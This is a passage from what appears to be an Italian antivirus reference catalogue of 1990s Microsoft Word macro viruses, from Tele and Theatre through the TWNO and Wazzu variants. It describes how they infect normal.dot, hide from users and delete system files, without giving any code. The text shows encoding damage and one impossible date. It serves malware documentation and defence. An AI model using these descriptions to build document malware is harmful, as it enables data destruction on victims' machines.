DateiDrucken, DateiNeu, DateiOeffnen, Telefonica Lunghezza della Macro: 22256 Byte Paese di origine: Germania Data di origine: Aprile 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: La macro "AutoExec" di Tele comprende una procedura di infezione del modello di documento principale (normal.dot), che non si infetta quando all'interno del file WIN.INI (sezione "Compatibility"), la stringa "0x0030303" Φ regolata su "LBYNJ". Tele usa la macro "Telefonica" per controllare per una precedente infezione. Non infetta il modello di documento principale se la macro Φ giα presente. I documenti sono infettati con "DateiBeenden" ("FileClose"), "DateiNeu" ("File/Nuovo") e "DateiOeffnen" ("File/Apri"), poichΘ alla fine di "DateiOeffnen" ("File/Apri") la macro "Telefonica" Φ chiamata nuovamente. I documenti infetti sono trasformati in file di modello, evenienza molto comune per i virus da macro. Tele ha due procedure distruttive. La prima si pu≥ trovare nella macro "DateiDrucken" (FileStampa). Stampando un documento, Tele controlla l'ora di sistema, ed in caso di valori inferiori a 10 nel campo dei secondi, aggiunge il seguente testo alla fine dei documenti salvati: " Lucifer by Nightmare Joker (1996) " La seconda procedura Φ attivata dalla macro "Telefonica" quando il campo dei secondi ha un valore di 0 o 1. ("Telefonica" Φ chiamata da "AutoOpen", "AutoExec" e "DateiOeffnen"). In questo caso, Tele crea uno script di Debug, (nome del file TELEFONI.SCR), nella cartella "C:\DOS" che comprende il virus basato sul DOS "Kampana.3784". Dopo aver creato il file script fil, LBYNJ esegue il file batch "TELEFONI.BAT" che usa il comando DOS "DEBUG.EXE" per convertire il file script in un eseguibile virus basato sul DOS e lo avvia. [Word_Temple.A] Nome del virus: Word.Temple.A Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AutoOpen (TempAutoOpen), TempAutoExec (AutoExec) TempFile/Apri (File/Apri), TempFile/Salva (File/Salva) Lunghezza della Macro: 1011 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Temple Φ un altro virus che infetta solamente Temple.A infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti sono infettati quando vengono aperti (AutoOpen) o salvati (File/Salva con nome). [Word_Theatre.A (a.k.a Taiwan.Theater)] Nome del virus: Word.Theatre.A (a.k.a Taiwan.Theater) Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: Si Nomi delle Macro: AutoOpen, CK, CK1, DocClose, FileClose, Strumenti/Macro Lunghezza della Macro: 7495 Byte Paese di origine: Taiwan Data di origine: Sconosciuta Distruttivo: Si Rilevato In The Wild: No Descrizione: Theatre Φ un altro virus da macro scritto per la versione Taiwanese/Cinese di Microsoft Word. Quando viene aperto un file infetto si attiva. Il primo di ogni mese, Theatre si avvia e cancella tutti i file directory principale di C:\. Questo rende il computer inavviabile. Sono mostrati i seguenti messaggi: " TAIWAN THEATRE VIRUS by Dark Word " " Hay..Hay..YOU GOT A THEATRE VIRUS. " [Word_Theater.B] Nome del virus: Word.Theatre.B Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: CK, DocClose, FileClose, Strumenti/Macro Lunghezza della Macro: 7495 Byte Paese di origine: Taiwan Data di origine: Sconosciuta Distruttivo: Si Rilevato In The Wild: No Descrizione: Theatre.B Φ un altro virus da macro scritto per la versione Taiwanese/Cinese di Microsoft Word. La differenza tra questa nuova versione e l'originale virus Theatre Φ la data di avvio ed i messaggi mostrati. Theatre.B cancella tutti i file directory principale di C:\. Il 15 di ogni mese. Mostra il seguente messaggio: " THEATRE " Theatre.B contiene errori nella macro "FileClose", non riesce cos∞ a fare altre infezioni. [Word_Toten.A:De] Nome del virus: Word.Toten.A:De Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: README, AutoOpen (DateiSpeichern) Lunghezza della Macro: 2057 Byte Paese di origine: Germania Data di origine: Primavera 1997 Payload: Si Rilevato In The Wild: Si Descrizione: Toten infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti sono infettati quando vengono salvati (DateiSpeichern). Quando Toten si avvia, cripta i documenti con delle password quasi casuali. Se si trova un documento con una password sconosciuta, bisogna scaricare una copia di WinWord Password Recovery Tool (wwprt). E' disponibile all'indirizzo: www.vdsarg.com. Quando un documento sarα salvato il primo Febbraio del 2000, Toten mostrerα il seguente messaggio in tedesco: " Der Virus wurde von M.N. aus Schwelm (BRD)am 08.06.1996 " " programmiert. Ich bin ein Hosen Fan. " Toten contiene molti altri commenti circa gruppi di musica punk tedeschi: " Die Toten Hosen ". Toten.A usa il linguaggio specifico delle macro, quindi lavora solamente con la versione tedesca di Microsoft Word. [Word_Twister.A] Nome del virus: Word.Twister.A Tipo di Virus: Virus da macro di Word Numero di Macro: 8 Criptato: No Nomi delle Macro: File/Salva con nome, AutoExec, twAC, File/Salva, AutoExit, twFC, twFE, twFQ, twFSA, twAE, AutoClose, twFS, twEX, FileClose, File/Esci, FileQuit Lunghezza della Macro: 4628 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Payload: No Rilevato In The Wild: No Descrizione: Twister Φ un virus molto semplice virus che non si riproduce. E' composto di due macro: una per infettare il modello di documento principale l'altra per infettare i documenti. Le cambia durante l'attivazione e durante l'infezione. La macro AutoExec contiene la seguente stringa: " Twister 2000" v.1 (c) Neo-Luddite Inc. " " For Robin Hood " [Word_TWNO.A (a.k.a. Taiwan_1)] Nome del virus: Word.TWNO.A (a.k.a. Taiwan_1) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 Criptato: No Nomi delle Macro: AutoOpen, AutoNew, AutoClose Lunghezza della Macro: 1567 Byte nei file con estensione *.DOC 4701 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Sconosciuta Payload: Si Rilevato In The Wild: Si Descrizione: TWNO fu il primo virus da macro scritto per la versione Taiwanese/Cinese di Microsoft Word. TWNO infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen), chiusi (AutoClose) o quando viene creato un nuovo documento (AutoNew). Mentre TWNO ha solo una macro nei documenti infetti, copia e rinomina 3 macro nel modello di documento principale. Il 13 di ogni mese TWNO inserisce testo nel documento attivo e mostra il seguente messaggio: " NO_1 Macro Virus " [Word_TWNO.B (a.k.a. KillMario)] Nome del virus: Word.TWNO.B (a.k.a. KillMario) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 Criptato: No Nomi delle Macro: AutoExec, AutoNew, AutoClose Lunghezza della Macro: 1387 Byte nei file con estensione *.DOC 4161 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Sconosciuta Payload: No Rilevato In The Wild: No Descrizione: TWNO.B Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione e l'originale virus TWNO.A Φ che TWNO.B contiene la macro "AutoExec" Invece della macro "AutoOpen". Questa prima generazione non Φ in grado di infettare altri documenti. Microsoft Word Φ bloccate quando l'utente avvia Word da un modello di documento principale giα infetto. [Word.TWNO.C] Nome del virus: Word.TWNO.C Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 1404 Byte nei documenti 4212 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.C Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione e l'originale virus TWNO.A Φ che TWNO.C contiene la macro "AutoExec" Invece della macro "AutoOpen". TWNO.C infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando vengono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Mentre TWNO.B non Φ in grado di infettare altri documenti TWNO.C Φ capace di infettare altri documenti ed esegue anche le proprie procedure distruttive. Il 28 di ogni mese, TWNO.C pone una domanda , ed in base alla risposta, esegue solo una delle sue procedure: 1. Cancella CONFIG.SYS, AUTOEXEC.BAT, eCOMMAND.COM! 2. Cancella tutti i file in C:\DOS e la cartella C:\ET3. Il primo di ogni mese, TWNO.C cancella i seguenti file: C:\COMMAND.COM C:\AUTOEXEC.BAT C:\CONFIG.SYS [Word_TWNO.D] Nome del virus: Word.TWNO.D Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 2105 Byte nei documenti 6315 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.D Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. Paragonato ai precedenti virus TWNO, il suo codice in WordBasic Φ stato riscritto. TWNO.D infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Il 25 di ogni mese, TWNO.D cambia gli argomenti del men∙ di Word E pone una domanda all'utente. In base alla risposta, cancella i seguenti file: "C:\DOS\*.*" "C:\WINDOWS\*.INI" DopodichΘ TWNO.D mostra 3 diversi messaggi. Il 15 di ogni mese, TWNO.D cancella i seguenti file: "C:\COMMAND.COM" "C:\CONFIG.SYS" "C:\MSDOS.SYS" "C:\IO.SYS" [Word_TWNO.K] Nome del virus: Word.TWNO.K Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 1403 Byte nei documenti 4209 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.K Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.K infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.L] Nome del virus: Word.TWNO.L Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 1402 Byte nei documenti 4206 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.L Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.L infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.M] Nome del virus: Word.TWNO.M Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 1392 Byte nei documenti 4176 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.M Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.M infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.N] Nome del virus: Word.TWNO.N Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 1264 Byte nei documenti 3792 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.N Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.N infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.O] Nome del virus: Word.TWNO.O Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 1406 Byte nei documenti 4218 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.O Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.O infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.P] Nome del virus: Word.TWNO.P Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 1404 Byte nei documenti 4212 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.P Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.P infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.Q] Nome del virus: Word.TWNO.Q Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 1286 Byte nei documenti 3858 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.Q Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.Q infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.R] Nome del virus: Word.TWNO.R Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 1214 Byte nei documenti 3642 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.R Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.R infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.S] Nome del virus: Word.TWNO.S Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 1212 Byte nei documenti 3636 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.S Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.S infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.T] Nome del virus: Word.TWNO.T Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 1206 Byte nei documenti 3618 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.T Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.T infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.U] Nome del virus: Word.TWNO.U Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 970 Byte nei documenti 2910 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.U Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.U infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.V] Nome del virus: Word.TWNO.V Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 924 Byte nei documenti 2772 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.V Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.V infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.W] Nome del virus: Word.TWNO.W Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 888 Byte nei documenti 2664 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.W Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.W infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TWNO.X] Nome del virus: Word.TWNO.X Tipo di Virus: Virus da macro di Word Numero di Macro: 1 o 3 (modello di documento principale) Criptato: No Nomi delle Macro: AutoOpen (AutoNew, AutoClose) Lunghezza della Macro: 872 Byte nei documenti 2616 Byte in modello di documento principale Paese di origine: Taiwan Data di origine: Autunno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: TWNO.X Φ un altro virus scritto per la versione Taiwanese/ Cinese di Microsoft Word. La differenza tra questa nuova versione ed il precedente virus TWNO.C Φ che il suo codice Φ stato leggermente modificato. TWNO.X infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando sono chiusi (AutoClose), creati (AutoNew) o aperti (AutoOpen). Per ulteriori informazioni, vedere la descrizione di TWNO.C. [Word_TwoLines.A] Nome del virus: Word.TwoLines.A Tipo di Virus: Virus da macro di Word Numero di Macro: 5 e 4 per A1 Criptato: Si Nomi delle Macro: MSRun, AutoExec, AutoOpen, AutoClose, File/Salva con nome Lunghezza della Macro: 1817 Byte or 1767 Byte Paese di origine: Sconosciuto Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: TwoLines infetta il modello di documento principale quando Φ aperto un documento infetto (AutoOpen) o chiuso (AutoClose). Come il nome suggerisce , aggiunge 2 righe vuote nel documento attivo quando il campo dei secondi dell'ora di sistema Φ 20. Responsabile di questa azione Φ la macro "MsRun". La macro "File/Salva con nome trasforma tutti i documenti in file di modello, ma non li infetta. Twolines.A si trasforma in Twolines.A1, che non contiene la macro "File/Salva con nome". PerchΘ ci≥ avvenga ci devono essere diverse condizioni: 1. Le AutoMacro sono disabilitate quando viene aperto un documento infetto. 2. Un documento Φ chiuso (AutoClose). 3. Il modello di documento principale contiene delle macro. [Word_UglyKid.A] Nome del virus: Word.Uglykid.A Tipo di Virus: Virus da macro di Word Numero di Macro: 3-4 Criptato: Si Nomi delle Macro: AutoOpen, (Strumenti/Macro, File/Salva) Lunghezza della Macro: polimorfico Paese di origine: Slovakia Data di origine: Aprile 1997 Payload: Si Rilevato In The Wild: No Descrizione: Uglykid.Φ un altro virus polimorfico da macro, che non pu≥ essere individuato con una semplice scansione o con un esatto rilievo CRC. UglyKid.A utilizza "Strumenti/Macro" per rendere l'individuazione di un documento infetto pi∙ difficile (chiamata tecnica macro stealth). Elimina i men∙ da File|Templates cos∞ che l'utente non possa cercare le macro del virus in un sistema infetto. Si avvisa di non selezionare il men∙ "Strumenti/Macro" finchΘ Φ usato per eseguire il codice del virus. UglyKid.A infetta anche altri documenti quando Φ usato il comando "File/Salva". La maggior parte degli altri virus polimorfici sono evidenti agli utenti, UglyKid.A cerca di nascondere la editing bar della macro. Invece mostra una barra grigia. La procedura di UglyKid.A cambia "User Info" con il men∙ Tool|Option. Aggiunge i seguenti commenti: " Name: Nasty " " Initial: Ugly " Per individuare UglyKid.A, avvertiamo di usare un programma antivirus che faccia un valido check sum. [Word_Wallpaper.A] Nome del virus: Word.Wallpaper.A Tipo di Virus: Virus da macro di Word Numero di Macro: 2 (o 5) Criptato: No Nomi delle Macro: AutoOpen, FilePrint (Strumenti/Macro, FileTemplates e ToolsCustomize) Lunghezza della Macro: 7353 Byte nei documenti 29088 Byte in modello di documento principale Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: Si Rilevato In The Wild: No Descrizione: Wallpaper.A infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen) o quando viene selezionato uno dei seguenti men∙: FilePrint FileTemplates Strumenti/Macro ToolsCustomize Wallpaper utilizza FileTemplate, ToolsCustomize e Strumenti/Macro per rendere l'identificazione di un documento infetto pi∙ difficile (chiamata tecnica macro stealth). Il 32 di ogni mese, Wallpaper inserisce un'immagine di un teschio (SK2.BMP). Quindi modifica AUTOEXEC.BAT e WIN.INI per cambiare le immagini dello sfondo di Windows. Il seguente file Φ creato anche nella cartella C:\WINDOWS: " REGSK2.REG " Wallpaper mostra anche il seguente messaggio il 31 di ogni mese: " [!!!PIRATE VIRUS!!!]--Active! The [PIRATE VIRUS] has pillaged " " your computer! GO BACK TO MS-WORD?? " [Word_Weather.A:Tw (aka Fish)] Nome del virus: Word.Weather.A:Tw (aka Fish) Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: AutoOpen, AutoNew, AutoExec,Tools/Macro Lunghezza della Macro: 4849 Byte Paese di origine: Taiwan Data di origine: 1996 Payload: Si Rilevato In The Wild: Si Descrizione: Weather.A si attiva quando viene aperto un documento infetto. Mostra un messaggio e pone all'utente una domanda. Per poter continuare a lavorare, l'utente deve inserire la risposta giusta. Utilizza "Strumenti/Macro" per rendere l'individuazione di un documento infetto pi∙ difficile (chiamata tecnica macro stealth). Weather lavora solamente con la versione Cinese/Taiwanese di Microsoft Word. [Word_Wazzu.A] Nome del virus: Word.Wazzu.A Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 632 Byte Paese di origine: Washington, USA Data di origine: Inviato su Usenet in Aprile 1996 Distruttivo: Si Rilevato In The Wild: Si Descrizione: Quando viene aperto un documento infetto, Wazzu.A controlla il nome del documento attivo. In caso sia "normal.dot", le macro del virus sono copiate dal modello principale al documento aperto. Altrimenti Φ infettato normal.dot. Wazzu non controlla che un documento sia giα stato infettato. Sovrascrive semplicemente la macro "autoopen". Wazzu ha una procedura distruttiva. Sceglie un numero a caso tra 0 e 1; se il numero Φ inferire a 0.2 (20% di probabilitα), il virus sposta una parola da una parte all'altra del documento. Questo viene fatto per tre volte. La probabilitα che una parola sia spostata Φ del 48,8%. Dopo la terza volta, Wazzu sceglie a caso un ultimo numero (tra 0 e 1) e se il valore Φ superiore 0.25 (25% di probabilitα), la parola "Wazzu" viene inserita nel documento. Dopo che i documenti infetti sono stati puliti, bisogna controllare bene il documento. Infatti la probabilitα che un documento sia stato modificato (parole spostate o aggiunte) Φ superiore al 61% . Questo pu≥ essere un lavoro lungo per i documenti molto grandi. Wazzu Φ il soprannome della "Washington State University". Wazzu.A Φ stato anche convertito nel formato di Word97 (Word8). [Word_Wazzu.AA] Nome del virus: Word.Wazzu.AA Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 1624 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione e l'originale virus Wazzu.A Φ che Wazzu.AA non aggiunge la parola "wazzu" ai nuovi documenti aperti. Wazzu.AA infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AB] Nome del virus: Word.Wazzu.AB Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 323 Byte Paese di origine: Australia Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed il precedente Wazzu Φ che Wazzu.AB Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AC] Nome del virus: Word.Wazzu.AC Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 433 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AC Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AD] Nome del virus: Word.Wazzu.AD Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 332 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AD Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AE] Nome del virus: Word.Wazzu.AE Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 618 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed il precedente Wazzu Φ che Wazzu.AE ha il codice leggermente modificato. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). La procedura Φ simile all'originale virus Wazzu. Ci sono 3 possibilitα su 5 che una parola, nel documento attivo, sia spostata. [Word_Wazzu.AF] Nome del virus: Word.Wazzu.AF Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 1484 Byte Paese di origine: USA Data di origine: Dicembre 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Wazzu.AF Φ una nuova variante basata sul vecchio Wazzu.D. L'unica differenza tra i due virus Φ che le prime linee bianche sono state cancellate. Per ulteriori informazioni, vedere la descrizione di Wazzu.D virus. [Word_Wazzu.AG] Nome del virus: Word.Wazzu.AG Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 332 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AG Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AH] Nome del virus: Word.Wazzu.AH Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi 